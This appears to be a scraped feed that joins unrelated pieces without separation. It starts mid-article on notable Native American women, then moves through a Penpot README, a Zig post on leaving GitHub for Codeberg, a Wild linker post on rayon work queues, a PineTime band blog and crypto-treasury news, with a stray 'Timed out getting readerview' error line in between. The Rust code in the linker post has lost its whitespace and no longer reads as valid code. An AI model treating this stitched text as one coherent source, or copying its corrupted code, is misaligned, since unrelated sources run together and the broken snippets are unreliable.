But La Flesche Picotte saw the need for some modernization. And she saw the need for a Native American to lead it. As a child, she remembered sitting with an old, sick woman who was waiting for a white doctor to treat her. Though he promised to come, he never did — and the woman died.
“It was only an Indian,” La Flesche Picotte recalled, “and it not matter.”
Determined to make a difference, La Flesche Picotte enrolled in the Women’s Medical College of Pennsylvania. In 1886, she took the train across the country at age 21 so that she could become a doctor. Few women — of any race — in the late 19th century took such a step. At the time, male doctors had
claimed
that academic stress could make women infertile.
Undeterred, La Flesche Picotte graduated first in her class and became the first Native American woman to earn a medical degree. Though she was encouraged to practice on the East Coast, she chose to return home to the Omaha Reservation to treat vulnerable patients there. Before long, she became the primary physician for more than 1,200 people.
Sometimes, the work could be taxing. La Flesche Picotte often traveled for hours in inclement conditions to reach people, some of whom distrusted her unfamiliar diagnoses. But La Flesche Picotte kept at it — treating both Native American and white patients — and even raised enough money to build a modern hospital in the reservation town of Walthill, Nebraska.
She died in 1915, eulogized by both local priests and members of the Omaha.
Buffalo Calf Road Woman: The Native American Woman Who Knocked Custer Off His Horse
As the Battle of the Little Bighorn raged between U.S. troops and Native Americans in Montana, Lt. Col. George Armstrong Custer suddenly found himself facing a female fighter. Her name was Buffalo Calf Road Woman.
Not much is known about the woman who charged toward Custer, knocking him off his horse and quite possibly striking the final blow that killed him. Buffalo Calf Road Woman — also called Buffalo Calf Trail Woman or Brave Woman — was likely born in the 1850s to the Northern Cheyenne. She married a man named Black Coyote and had two children with him.
She first distinguished herself about a week before the Battle of the Little Bighorn during the Battle of the Rosebud. Then, Buffalo Calf Road Woman insisted on riding alongside male warriors as they set out to confront U.S. troops. Despite some grumbling from other fighters, they let her join.
During the battle, she sprang into action when she noticed that U.S. soldiers had trapped her brother, Chief Comes in Sight, in a gully. She rode straight into the melee, grabbed her brother, and pulled him onto her horse.
Her bravery impressed the other warriors, who dubbed the conflict “The Battle Where the Girl Saved Her Brother.” But Buffalo Calf Road Woman’s true claim to fame came about a week later, as the Northern Cheyenne, Lakota Sioux, and Arapaho faced off against Custer and his troops.
According to Wallace Bearchum, the Director of Tribal Services for the Northern Cheyenne, Buffalo Calf Road Woman acted bravely during the Battle of the Little Bighorn. Fighting “out in the open,” she
never took cover
during the conflict, and “she stayed on her horse the entire time.”
When Buffalo Calf Road Woman spotted Custer, she raised a club — and charged him. And according to the tribe’s oral history, her blow sent him flying off his horse, a move which may have led to his death.
Though the Cheyenne won the battle, they lost the larger war. Buffalo Calf Road Woman spent the rest of her short life fighting off attacks and seeking safety with her tribe. She died in 1879, likely of diphtheria.
Her story remained untold for over a century — but the Cheyenne never forgot about her. Fearing retribution, they kept their silence about the Battle of the Little Bighorn until 2005. Then, they told the world about Buffalo Calf Road Woman and the blow that may have very well killed Custer.
Lyda Conley: The First Native American Woman To Argue Before The Supreme Court
Lyda Conley boldly argued before the Supreme Court to save her tribe’s ancestral burial ground. (Public Domain photo)
When Eliza “Lyda” Burton Conley realized that white developers wanted to snatch up her tribe’s ancestral burial ground, she resolved to defend it. Conley got a law degree — no small feat for a woman in 1902 — and physically guarded the cemetery’s entrance with her musket.
“I will go to Washington and personally defend [the cemetery],” Conley
avowed
. “No lawyer could plead for the grave of my mother as I could, no lawyer could have the heart interest in the case that I have.”
Born to a mother from the Wyandotte tribe and an English farmer around 1868, Conley grew up in Kansas. She later learned that some developers wanted to repurpose the Huron Indian Cemetery, located in Kansas City, Kansas. As the city grew, it had become a valuable piece of land.
Conley had a personal stake in the matter. Her family had buried her mother and one of her sisters in the cemetery. But Conley also believed that an 1855 federal treaty with the Wyandotte protected the land from development.
Determined to make her case, she enrolled as one of the only women at the Kansas City School of Law and gained admission to the Missouri Bar in 1902. When Congress approved legislation to sell the land and move the bodies buried there four years later, Conley was ready to fight back.
First, she filed an injunction against the U.S. Secretary of the Interior and Indian Commissioners in the U.S. District Court. Then, Conley and one of her sisters set up camp in front of the cemetery. Armed with a gun, they built a shack called “Fort Conley” to discourage any potential trespassers.
The battle went all the way to the Supreme Court, where Conley became the first Native American woman to argue a case before the justices. They listened to her, but they ultimately sided with the developers.
Nevertheless, Conley continued to fight. She spent most of her time at the cemetery — until she was murdered during a robbery in 1946. After that, others picked up the baton, inspired by her devotion to the cause.
In 1971, the Huron Indian Cemetery was added to the National Register of Historic Places. And in 2017, it was designated a National Historic Landmark, preventing any development in the future. Lyda Conley didn’t live to see it, but the cemetery — where she too was buried — was saved.
Sarah Winnemucca: The Paiute Woman Who Stood Up For Her People
Sarah Winnemucca was the first Native American woman to write an English-language autobiography. (Photo: Wikimedia Commons)
Outraged at how white settlement had devastated her people, Sarah Winnemucca began to speak out. She traveled America in the 1880s and wrote a fiery autobiography called
Life Among the Paiutes
in 1883.
“For shame! For shame!” Winnemucca wrote. “You dare to cry out Liberty, when you hold us in places against our will, driving us from place to place as if we were beasts.”
Born Thocmetony (Shell Flower) to the Northern Paiute people, Winnemucca spent most of her life straddling the line between the “white” world and the “Native” world. She grew up traveling with her tribe in modern-day Nevada and Oregon, but she later attended a convent school in San Jose, California — until furious white parents forced her to leave.
Afterward, Winnemucca accompanied her family to their new reservation near Pyramid Lake in Nevada. Unfamiliar with the dry landscape — and victims of thefts by government agents who stole their aid money — many Paiutes starved to death. Winnemucca, who had mastered English from an early age, attempted to act as an interpreter for her people.
But it was tough work. Not only did Winnemucca have to work with cruel government agents like William V. Rinehart, but many of her own people grew to distrust her. Meanwhile, things for the Paiutes seemed to get worse and worse. So Winnemucca decided to speak out on their behalf.
Starting in San Francisco, Sarah Winnemucca traveled around the country and spoke her mind. Wearing traditional clothing and billing herself as a “princess,” Winnemucca described the hardships forced upon her people.
“I would be the first Indian woman who ever spoke before white people,” Winnemucca told a reporter, “and they don’t know what the Indians have got to stand sometimes.”
Her fearless activism eventually caught the eye of members of the Transcendentalist movement, who arranged for the publication of her autobiography. Pen in hand, Winnemucca didn’t hold back.
“Since the war of 1860 there have been one hundred and three (103) of my people murdered, and our reservation taken from us; and yet we, who are called blood-seeking savages, are keeping our promises to the government,” Winnemucca thundered. “Oh, my dear good Christian people, how long are you going to stand by and see us suffer at your hands?”
At first, her book seemed like it might make a difference. The president, Rutherford B. Hayes, and the U.S. government as a whole promised to help with reforms. But their words fell flat — and nothing changed.
Winnemucca spent some of her final years teaching at a Paiute school in Nevada before it was shut down due to the Dawes Act, which mandated that Indigenous children be taught in white-run schools. Though she died in 1891, her powerful testament to the plight of her people lives on.
Maria Tallchief: The Native American Woman Who Transformed Ballet
Maria Tallchief became the first Native American prima ballerina. (Photo: School of American Ballet)
As a girl growing up in early-20th-century Oklahoma,
Maria Tallchief
and her sister were often encouraged to act out “Indian” dances at country fairs.
“It wasn’t remotely authentic,” Tallchief later
wrote
of the experience.
“Traditionally, women didn’t dance in Indian tribal ceremonies. But I had toe shoes on under my moccasins, and we both wore fringed buckskin outfits, headbands with feathers, and bells on our legs. We’d enter from opposite wings, greet each other, and start moving to a tom-tom rhythm.”
But Tallchief’s early experiences didn’t dissuade her from pursuing dancing. The daughter of an Osage man and a Scottish-Irish woman, she’d found a passion for the craft and soon leaped into the world of ballet.
After training in Los Angeles, Tallchief moved to New York and snagged a part in Ballet Russe de Monte Carlo, a leading touring company, in 1942. There, Tallchief’s talent attracted the ire of some of the other dancers. But it also caught the eye of famed choreographer George Balanchine.
Before long, Tallchief became Balanchine’s muse — and briefly his wife. At Balanchine’s New York City Ballet, he even created a role specifically for Tallchief in his 1949 version of Stravinsky’s
The Firebird
.
In a rave review of Tallchief’s performance, a
New York Times
dance critic swooned that Balanchine had “asked her to do everything except spin on her head, and she does it with complete and incomparable brilliance.”
Tallchief also danced as the Swan Queen in Balanchine’s version of
Swan Lake
and the Sugar Plum Fairy in his version of
The Nutcracker
. Even after she and Balanchine divorced in 1950, she continued dancing with his company and other companies until the late 1960s. She later went on to work as a dance instructor and artistic director in Chicago.
Maria Tallchief, who died at age 88 in 2013, is remembered today as America’s first major prima ballerina, and the first Native American prima ballerina. But Tallchief always saw herself as a dancer above anything else.
“Above all, I wanted to be appreciated as a prima ballerina who happened to be a Native American, never as someone who was an American Indian ballerina,” she once said.
Nancy Ward: The Cherokee “War Woman” Who Fought For Peace
A statue of Nancy Ward that once stood in Tennessee. (Photo: Pinterest)
Nancy Ward
— born Nanyehi or “she who walks among the spirits” — became famous during a battle between the Cherokee and the Creek Nation in 1755. While chewing lead bullets for her husband to make them deadlier, she saw him fall and die on the battlefield. In response, she quickly grabbed his rifle, rallied the troops, and helped lead the Cherokee to victory.
Afterward, the Cherokee
bestowed
a new title upon her: Ghighau, a “Beloved Woman.” They also made her the head of the Women’s Council of Clan Representatives and gave her a vote on the Cherokee General Council.
But despite being known as a “war woman,” Ward was less interested in war than in peace. She’d grown up as the niece of a Cherokee chief named Attakullakulla, who believed that the Cherokee needed to coexist with British colonists in order to survive. Ward embraced his point of view.
As colonists increasingly pushed into Cherokee territory, Ward advocated for peaceful coexistence. And, for a short time, the Cherokee and the white settlers lived side by side. Ward even married a white man, Bryan Ward, and she learned how to make cheese and butter from a white woman settler.
Ward attempted to keep things peaceful even as the colonists continued to take tribal land. She discouraged the frequent Cherokee raids on white settlements. And when the American Revolutionary War broke out in 1775, Ward took the side of the colonists — even though most Cherokee wanted to take advantage of the situation to drive out the settlers.
When the colonists and the Cherokee tried to take steps toward a truce, they appointed Ward as their negotiator. She pleaded for peace.
“You know that women are always looked upon as nothing,” Ward said, “but we are your mothers; you are our sons. Our cry is all for peace; let it continue. This peace must last forever. Let your women’s sons be ours; let our sons be yours. Let your women hear our words.”
Although her efforts produced an uneasy truce, it didn’t last.
As time marched on, the settlers continued to gobble up Cherokee territory — and Ward’s once-powerful belief in peaceful coexistence began to fade. She was left to beg tribal leaders to not agree to a deal proposed by the U.S. government, which would exchange their tribal lands for different lands.
“We have raised all of you on the land which we now have. Your mothers, your sisters ask and beg of you not to part with any more of our land,” said Ward, who was about 80 years old by then.
Despite her protests — and the protests of other women — the deal went through. Ward died in 1822 as the last Ghigau of the Cherokee.
Sacagawea: The Shoshone Interpreter Who Led The Lewis And Clark Expedition
Sacagawea, as depicted on a mural alongside Lewis and Clark at the Montana House of Representatives. (Photo in the public domain)
When Meriwether Lewis and William Clark set out in 1804 to explore lands past the Mississippi River, they enlisted a French-Canadian trapper named Toussaint Charbonneau to be their interpreter and guide. Charbonneau brought along his 16-year-old wife, a Native American teenager named Sacagawea. In the end, she proved much more vital to the mission.
Before joining up with Lewis and Clark, Sacagawea had had a painful life. She was born to the Shoshone tribe around 1789 but was later kidnapped by a rival tribe, the Hidatsa. They eventually sold her to Charbonneau.
By the time Lewis and Clark appeared on the scene, Sacagawea was heavily pregnant. She gave birth to her son in February 1805, strapped him to her back, and joined up with the exploration party.
There, she proved indispensable. Her mere presence helped discourage attacks by other Native Americans, who saw her and her baby as a sign that Lewis and Clark were on a peaceful mission. Plus, she could also interpret Hidatsa and Shoshone languages, and identify edible plants and roots.
“The men who were complaining of the head ake and cholick yesterday and last night are much better to day,” Clark wrote in 1806. “ gathered a quantity of fenel roots which we find very paliatiable and nurushing food.”
She proved herself in other ways as well. When a boat flipped during a river crossing, Sacagawea not only saved herself and her son from drowning but also managed to gather important documents that had fallen into the water.
“The Indian woman… has been of great service to me as a pilot through this country,” Clark wrote.
But despite her invaluable work, Sacagawea received little more than recognition. After parting ways with Lewis and Clark, Charbonneau received $500 and 320 acres of land. Sacagawea did not get anything.
Wilma Mankiller: The Fearless Cherokee Chief
Chief Wilma Mankiller, pictured in 1993. (Photo: Judy Weintraub/The Washington Post)
In 1987, Wilma Mankiller did what no other Native American woman had done before — she became the Principal Chief of a major tribe.
During her tenure, which lasted until 1995, Mankiller oversaw a budget that grew to $150 million a year, watched Cherokee membership triple, and advocated for better education, healthcare, and housing services. And when she ran for reelection in 1991, she won 83 percent of the vote.
She fought hard to get there. Born to a Cherokee father and a white mother in 1945 in Oklahoma, Mankiller and her family were eventually forced to move to San Francisco as part of a relocation policy of the Bureau of Indian Affairs. It was, Mankiller later
reflected
, “my own little Trail of Tears.”
But living in California would change her life. As a teenager, Mankiller had a front-row seat to the social movements of the 1960s. And in 1969, she watched with awe and admiration as Native American activists occupied Alcatraz to raise awareness of the U.S. government’s treatment of Natives.
“When Alcatraz occurred, I became aware of what needed to be done to let the rest of the world know that Indians had rights, too,” Mankiller recalled.
Though she was married to an Ecuadorian businessman from 1963 to 1977, the pair ultimately divorced. Mankiller then returned home to Oklahoma with her two daughters. There, she volunteered with tribal affairs and started to work with the Cherokee Nation as an economic stimulus coordinator. Before long, Mankiller had founded the Community Development Department for the Cherokee Nation to help increase access to water and housing.
Her hard work caught the eye of Ross Swimmer, the tribe’s Principal Chief. He selected her as his running mate in his re-election campaign in 1983, making Mankiller the Deputy Chief of the Cherokee Nation.
When he resigned two years later, Mankiller took his place and later won the election in her own right in 1987. “Prior to my election,” she said, “Cherokee girls would have never thought that they might grow up and become chief.”
Though health problems forced Mankiller to step down in 1995, Mankiller remained heavily involved with the Cherokee Nation. Her legacy of hard work eventually earned her the Presidential Medal of Freedom in 1998.
She died in 2010 at age 64 and was soon memorialized as a trailblazer.
Pocahontas: One Of The Most Famous Native American Women In U.S. History
The only known depiction of Pocahontas that was made during her life. Circa 1616. (Photo in the public domain)
For many, the name “Pocahontas” conjures up lighthearted images of animated Disney characters. But
Pocahontas
was a real Native American woman whose story differs significantly from the famous Disney movie. Indeed, “Pocahontas” wasn’t even her real name.
Born around 1596, Pocahontas was named Amonute. She also had the more private name of Matoaka, and later picked up the nickname Pocahontas, which means “playful one.” The daughter of Chief Powhatan, Pochahontas likely spent her early life learning tasks assigned to Powhatan women.
But everything changed when Pocahontas was 11 years old. Then, in 1607, a group of English people arrived and started to settle in Jamestown. Pocahontas met one of the colonists that year: a man named John Smith.
In the Disney version of her story, Pocahontas falls in love with Smith. In reality, Pocahontas was just a child when she met him. And Smith claimed that he was captured by Pocahontas’s tribe — and feared for his life.
As Smith told it, the Powhatan tribe was about to execute him. But then, Pocahontas saved his life by throwing herself between him and his would-be executioner. However, many historians suspect that Smith misinterpreted what happened. One theory states that the “execution” was actually a tribal ceremony that formalized Smith’s place among the Powhatan.
But Smith’s encounter with the Powhatan did open up relations between the settlers and Native Americans. For a short while, they lived in peace and the Native Americans helped out the settlers by offering them supplies. But then, the settlers started demanding more and more supplies. Amid rising tensions, Smith returned to England for medical care.
After Smith left, Pocahontas continued to interact with the white settlers — though not always by choice. Around 1613, she was kidnapped by a group of English colonists and held for ransom. Since she was Chief Powhatan’s favorite daughter, Pocahontas tragically became a bargaining chip for the English in the midst of their many conflicts with the Powhatan.
During her captivity, she met
John Rolfe
, who became her husband and later brought her and their son to England. There, Pocahontas was exhibited as evidence of the settlers’ success in “taming” a “savage.” By that point, Pocahontas had converted to Christianity and taken on the name “Rebecca.”
She sadly died on the trip home — leaving no record of her own thoughts and reflections on her tragic, short, and historic life.
[
Kaleena Fraga
is a senior staff writer for All That's Interesting since 2021 and co-host of the History Uncovered Podcast, Kaleena Fraga graduated with a dual degree in American History and French Language and Literature from Oberlin College. She previously ran the presidential history blog History First, and has had work published in The Washington Post, Gastro Obscura, and elsewhere. She has published more than 1,200 pieces on topics including history and archaeology. She is based in Brooklyn, New York.
Editor:
Cara Johnson
is a writer and editor based in Charleston, South Carolina and an editor at All That's Interesting since 2022, Cara Johnson holds a B.A. in English and Creative Writing from Washington & Lee University and an M.A. in English from College of Charleston. She has worked for various publications ranging from wedding magazines to Shakespearean literary journals in her nine-year career, including work with Arbordale Publishing and Gulfstream Communications.]
Penpot is the first
open-source
design tool for design and code collaboration. Designers can create stunning designs, interactive prototypes, design systems at scale, while developers enjoy ready-to-use code and make their workflow easy and fast. And all of this with no handoff drama.
Available on browser or self-hosted, Penpot works with open standards like SVG, CSS, HTML and JSON, and it’s free!
The latest updates take Penpot even further. It’s the first design tool to integrate native
design tokens
—a single source of truth to improve efficiency and collaboration between product design and development.
With the
huge 2.0 release
, Penpot took the platform to a whole new level. This update introduces the ground-breaking
CSS Grid Layout feature
, a complete UI redesign, a new Components system, and much more.
For organizations that need extra service for its teams,
get in touch
🎇 Design, code, and Open Source meet at
Penpot Fest
! Be part of the 2025 edition in Madrid, Spain, on October 9-10.
Penpot expresses designs as code. Designers can do their best work and see it will be beautifully implemented by developers in a two-way collaboration.
Plugin system
Penpot plugins
let you expand the platform's capabilities, give you the flexibility to integrate it with other apps, and design custom solutions.
Designed for developers
Penpot was built to serve both designers and developers and create a fluid design-code process. You have the choice to enjoy real-time collaboration or play "solo".
Inspect mode
Work with ready-to-use code and make your workflow easy and fast. The inspect tab gives instant access to SVG, CSS and HTML code.
Self host your own instance
Provide your team or organization with a completely owned collaborative design tool. Use Penpot's cloud service or deploy your own Penpot server.
Integrations
Penpot offers integration into the development toolchain, thanks to its support for webhooks and an API accessible through access tokens.
Building Design Systems: design tokens, components and variants
Penpot brings design systems to code-minded teams: a single source of truth with native Design Tokens, Components, and Variants for scalable, reusable, and consistent UI across projects and platforms.
Getting started
Penpot is the only design & prototype platform that is deployment agnostic. You can use it in our
SAAS
or deploy it anywhere.
Learn how to install it with Docker, Kubernetes, Elestio or other options on
our website
.
Community
We love the Open Source software community. Contributing is our passion and if it’s yours too, participate and
improve
Penpot. All your designs, code and ideas are welcome!
If you need help or have any questions; if you’d like to share your experience using Penpot or get inspired; if you’d rather meet our community of developers and designers,
join our Community
!
Anyone who contributes to Penpot, whether through code, in the community, or at an event, must adhere to the
code of conduct
and foster a positive and safe environment.
Contributing
Any contribution will make a difference to improve Penpot. How can you get involved?
Participate in the
Community
space by asking and answering questions; reacting to others’ articles; opening your own conversations and following along on decisions affecting the project.
Contribute to Penpot's code:
Watch this video
by Alejandro Alonso, CIO and developer at Penpot, where he gives us a hands-on demo of how to use Penpot’s repository and make changes in both front and back end
To find (almost) everything you need to know on how to contribute to Penpot, refer to the
contributing guide
.
Resources
You can ask and answer questions, have open-ended conversations, and follow along on decisions affecting the project.
This Source Code Form is subject to the terms of the Mozilla Public
License, v. 2.0. If a copy of the MPL was not distributed with this
file, You can obtain one at http://mozilla.org/MPL/2.0/.
Copyright (c) KALEIDOS INC
This book is an introduction to data structures and algorithms for
functional languages, with a focus on proofs. It covers both
functional correctness and running time analysis. It does so in a
unified manner with inductive proofs about functional programs and
their running time functions. All proofs have been
machine-checked by the proof assistant
Isabelle
. The pdf contains
links to the corresponding Isabelle theories.
Click on an image to download the pdf of the whole book:
This book is meant to evolve over time. If you would like to contribute, get in touch!
Migrating the Main Zig Repository from GitHub to Codeberg
Putting aside GitHub’s
relationship with ICE
, it’s abundantly clear that the talented folks who used to work on the product have moved on to bigger and better things, with the remaining losers eager to inflict some kind of bloated, buggy JavaScript framework on us in the name of progress. Stuff that used to be snappy is now sluggish and often entirely broken.
More importantly, Actions is
created by monkeys
and
completely neglected
. After the
CEO of GitHub said to “embrace AI or get out”
, it seems the lackeys at Microsoft took the hint, because GitHub Actions started “vibe-scheduling”; choosing jobs to run seemingly at random. Combined with other bugs and inability to manually intervene, this causes our CI system to get so backed up that not even master branch commits get checked.
Rather than wasting donation money on more CI hardware to work around this crumbling infrastructure, we’ve opted to switch Git hosting providers instead.
As a bonus, we look forward to fewer violations (exhibit
A
,
B
,
C
) of our
strict no LLM / no AI policy
, which I believe are at least in part due to GitHub aggressively pushing the “file an issue with Copilot” feature in everyone’s face.
GitHub Sponsors
The only concern we have in leaving GitHub behind has to do with GitHub Sponsors. This product was key to Zig’s early fundraising success, and it
remains a large portion of our revenue today
. I can’t thank
Devon Zuegel
enough. She appeared like an angel from heaven and single-handedly made GitHub into a viable source of income for thousands of developers. Under her leadership, the future of GitHub Sponsors looked bright, but sadly for us, she, too, moved on to bigger and better things. Since she left, that product as well has been neglected and is already starting to decline.
Although GitHub Sponsors is a large fraction of Zig Software Foundation’s donation income,
we consider it a liability
. We humbly ask if you, reader, are currently donating through GitHub Sponsors, that you consider
moving your recurring donation to Every.org
, which is itself a non-profit organization.
As part of this, we are sunsetting the GitHub Sponsors perks. These perks are things like getting your name onto the home page, and getting your name into the release notes, based on how much you donate monthly. We are working with the folks at Every.org so that we can offer the equivalent perks through that platform.
Migration Plan
Effective immediately, I have made
ziglang/zig on GitHub
read-only, and the canonical origin/master branch of the main Zig project repository is
https://codeberg.org/ziglang/zig.git
.
Thank you to the Forgejo contributors who helped us with our issues switching to the platform, as well as the Codeberg folks who worked with us on the migration - in particular
Earl Warren
,
Otto
,
Gusted
, and
Mathieu Fenniak
.
In the end, we opted for a simple strategy, sidestepping GitHub’s aggressive vendor lock-in: leave the existing issues open and unmigrated, but start counting issues at 30000 on Codeberg so that all issue numbers remain unambiguous. Let us please consider the GitHub issues that remain open as metaphorically “copy-on-write”.
Please leave all your existing GitHub issues and pull requests alone
. No need to move your stuff over to Codeberg unless you need to make edits, additional comments, or rebase.
We’re still going to look at the already open pull requests and issues
; don’t worry.
In this modern era of acquisitions, weak antitrust regulations, and platform capitalism leading to extreme concentrations of wealth, non-profits remain a bastion defending what remains of the commons.
The
Wild linker
makes very extensive use of
rayon
for parallelism. Much of this parallelism is in the
form of
par_iter
and friends. However, some parts of the linker don’t fit neatly because the amount of work isn’t
known in advance. For example, the linker has two places where it explores a graph. When we start,
we know some roots of that graph, but we don’t know all the nodes that we’ll need to visit. We’ve
gone through a few different approaches for how we implement such algorithms. This post covers those
approaches and what we’ve learned along the way.
Spawn broadcast
Our first approach was to spawn a task for each thread (rayon’s
spawn_broadcast
)
then do our own work sharing and job control between those threads. By “our own job control” I mean
that each thread would pull work from a channel and if it found no work, it’d
park the
thread
. If new work came up, the thread that
produced the work would wake a parked thread.
This was complex. Worse, it didn’t allow us to use other rayon features while it was running. For
example, if we tried to do a par_iter from one of the threads, it’d only have the current thread to
work with because all the others were doing their own thing, possibly parked, but in any case, not
available to rayon.
The idea here is that we create a scope and spawn some initial tasks into that scope. Those tasks
then spawn additional tasks and so on until eventually there are no more tasks.
The rayon documentation warns that this is more expensive than other approaches, so should be
avoided if possible. The reason it’s more expensive is that it heap-allocates the task. Indeed, when
using this approach, we do see increased heap allocations.
Channel + par_bridge
Another approach that I’ve tried recently and which arose out of the desire to reduce heap
allocations is to put work into a
crossbeam
channel
. The work
items can be an enum if there are different kinds. Our work scope is then just something like the
following:
let(work_send,work_recv)=crossbeam_channel::unbounded();// Add some initial work items. fornodeinroots{work_send.send(WorkItem::ProcessNode(node,work_send.clone()));}// Drop sender to ensure we can terminate. Each work item has a copy of the sender. drop(work_send);work_recv.into_iter().par_bridge().for_each(|work_item|{matchwork_item{WorkItem::ProcessNode(node,work_send)=>{explore_graph(node,work_send);}}});
The trick with this approach is that each work item needs to hold a copy of the send-end of the
channel. That means that when processing work items, we can add more work to the queue. Once the
last work item completes, the last copy of the sender is dropped and the channel closes.
This approach works OK. It does avoid the heap allocations associated with scoped spawning. It is a
little bit complex, although not as complex as doing all the job control ourselves. One downside is
that like doing job control ourselves, it doesn’t play nicely with using
par_iter
inside of worker
tasks. The reason why is kind of subtle and is due to the way rayon is implemented. What can happen
is that the
par_iter
doesn’t just process its own tasks. It can also steal work from other
threads. When it does this, it can end up blocking trying to pull another work item from the
channel. The trouble is that because the
par_iter
was called from a work item that holds a copy of
the send-end of the channel, we can end up deadlocked. The channel doesn’t close because we hold a
sender and we don’t drop the sender because we’re trying to read from the read-end of the channel.
Another problem with this approach that I’ve just come to realise is that it doesn’t compose well. I
had kind of imagined just getting more and more options in my
WorkItem
enum as the scope of the
work increased. The trouble is that working with this kind of work queue doesn’t play nicely with
the borrow checker. An example might help. Suppose we have some code written with rayon’s
par_chunks_mut
and we want to flatten that work into some other code that uses a channel with work items. First we
need to convert the
par_chunks_mut
code into a channel of work items.
letfoo=create_foo();foo.par_chunks_mut(chunk_size).for_each(|chunk|{// Do work with mutable slice `chunk` });
If we want the creation of
foo
to be a work item and each bit of processing to also be work items,
there’s no way to do that and have the borrow checker be happy.
matchwork_item{WorkItem::CreateAndProcessFoo=>{letfoo=create_foo();// Split `foo` into chunks and queue several `WorkItem::ProcessChunk`s….? }WorkItem::ProcessChunk(chunk)=>{// Do work with mutable slice `chunk`. }}
So that clearly doesn’t work. There’s no way for us to take our owned
foo
and split it into chunks
that can be processed as separate
WorkItem
s. The borrow checker won’t allow it.
Another problem arises if we’ve got two work-queue-based jobs and we’d like to combine them, but the
second job needs borrows that were taken by the first job to be released before it can run. This
runs into similar problems.
The kinds of code structures we end up with here feel a bit like we’re trying to write async code
without async/await. This makes me wonder if async/await could help here.
Async/await
I don’t know exactly what this would look like because I haven’t yet tried implementing it. But I
imagine it might look a lot like how the code is written with rayon’s scopes and spawning. Instead
of using rayon’s scopes, it’d use something like
async_scoped
.
One problem that I have with rayon currently is, I think, solved by using async/await. That problem,
which I briefly touched on above is described in more detail here. Suppose we have a
par_iter
inside some other parallel work:
outer_work.par_iter().for_each(|foo|{letfoo=inputs.par_iter().map(|i|...).collect();// < Some other work with `foo` here, hence why we cannot merge the two par_iters >foo.par_iter().map(|i|...).for_each(|i|...);});
If the thread that we’re running this code on becomes idle during the first inner
par_iter
, that
thread will try to steal work from other threads. If it succeeds, then even though all the work of
the
par_iter
is complete, we can’t continue to the second inner
par_iter
until the stolen work
also completes. However, with async/await, tasks are not tied to a specific thread once started.
Threads steal work, but tasks don’t, so the task that’s running the above code would become runnable
as soon as the
par_iter
completed even if the thread that had originally been running that task
had stolen work - the task could just be run on another thread.
It’d be very interesting to see what async/await could contribute to the parallel computation space.
I don’t have any plans to actually try this at this stage, but maybe in future.
Return to scoped spawning and future work
In the meantime, I’m thinking I’ll return to scoped spawning. Using a channel works fine for simple
tasks and it avoids the heap allocations, but it really doesn’t compose at all well.
I am interested in other options for avoiding the heap allocations. Perhaps there’s options for
making small changes to rayon that might achieve this. e.g. adding support for spawning tasks
without boxing, provided the closure is less than or equal to say 32 bytes. I’ve yet to explore such
options though.
Thanks
Thanks to everyone who has been
sponsoring
my work on
Wild, in particular the following, who have sponsored at least $15 in the last two months:
CodeursenLiberte
repi
rrbutani
Rafferty97
wasmerio
mati865
Urgau
mstange
flba-eb
bes
Tudyx
twilco
sourcefrog
simonlindholm
petersimonsson
marxin
joshtriplett
coreyja
binarybana
bcmyers
Kobzol
HadrienG2
+3 anonymous
The Tesla Model Y Just Scored the Worst Reliability Rating in a Decade
Bonsai_term is a library that lets you write Terminal UIs (TUIs) using
OCaml. It uses the same programming model as the
bonsai_web
library.
Getting started
If you are new to OCaml - or if you haven't already -
install
opam
. It is OCaml's package manager
and we'll be using it to install
bonsai_term
and its dependencies.
The specific installation instructions depend on your platform. You
can find platform-specific instructions
here
.
bonsai_term
uses
OxCaml
so the next thing
you'll want to do is install
oxcaml
by following the instructions
here
.
Run
opam install bonsai_term
. (This will install
bonsai_term
and its dependencies).
At this point you should now have
bonsai_term
"installed".
To learn how to use
bonsai_term
you can read its MLI
src/bonsai_term.mli
and / or look
at some examples in the
bonsai_term_examples
repo.
To learn how to use
bonsai
, you can read the docs in
bonsai_web
.
(most of those docs are aimed at the "web" version of bonsai, so the "vdom" bits may not
apply, but the "effect" / "state-fulness" and ways of doing "incrementality" all should
transfer from
bonsai_web
into
bonsai_term
).
To learn how to use
ocaml
here are some good resources:
Timed out getting readerview for https://www.analog.com/en/resources/analog-dialogue/articles/dsp-101-part-1.html
Russell Coker: PineTime Band
PlanetDebian
etbe.coker.com.au
2025-11-27 00:37:27
I’ve had a Pine Time for just over 2 years [1]. About a year ago I had a band break and replaced it from a spare PineTime and now I just had another break. Having the band only last one year isn’t that great, but it’s fortunate that the break only affects the inner layer of plastic so there is no ri...
I started writing this post while using the band from a
Colmi P80 [3]
. I bought one for a relative who wanted the metal band and the way the Aliexpress seller does it is to sell the package with the plastic band and include the metal band in the package so I had a spare band. It fits quite well and none of the reported problems of the PineTime having insufficient space between the spring bar and the watch. The Colmi band in question is described as “rose gold” but is more like “pinkish beige” and doesn’t match the style of the black PineTime.
I ordered a couple of cheap bands from AliExpress which cost $9.77 and $13.55 including postage while the ones that Pine64 recommend have over $15 postage from Amazon!
There are claims that getting a replacement band for a PineTime is difficult. My experience is that every band with a 20mm attachment works as long as it’s designed for a square watch, some of the bands are designed to partly go around a round face and wouldn’t fit. I expect that some bands won’t fit, but I don’t think that it’s enough of a problem to be worried about buying a random band from AliExpress. The incidence of bands not fitting will probably be lower than the incidence of other AliExpress products not doing quite what you want (while meeting the legal criteria of doing what they are claimed to do) and not being used.
I’m now wearing the PineTime with the “Magnetic Buckle Watch Strap Band” and plan to wear it for the next year or so.
Sam Roberts, reporting for The New York Times:
David Lerner, a high school dropout and self-taught computer geek
whose funky foothold in New York’s Flatiron district, Tekserve,
was for decades a beloved discount mecca for Apple customers
desperate to retrieve lost data and repair frozen hard dri...
“It was inevitable,” said Jake Ostrovskis, head of OTC trading at Wintermute, referring to the sell-off in digital asset treasury stocks. “It got to the point where there’s too many of them.”
Several companies have begun selling their crypto stockpiles in an effort to fund share buybacks and shore up their stock prices, in effect putting the crypto treasury model into reverse.
North Carolina-based ether holder FG Nexus sold about $41.5 million of its tokens recently to fund its share buyback program. Its market cap is $104 million, while the crypto it holds is worth $116 million. Florida-based life sciences company turned ether buyer ETHZilla recently sold about $40 million worth of its tokens, also to fund its share buyback program.
Sequans Communications, a French semiconductor company, sold about $100 million of its bitcoin this month in order to service its debt, in a sign of how some companies that borrowed to fund crypto purchases are now struggling. Sequans’ market capitalization is $87 million, while the bitcoin it holds is worth $198 million.
Georges Karam, chief executive of Sequans, said the sale was a “tactical decision aimed at unlocking shareholder value given current market conditions.”
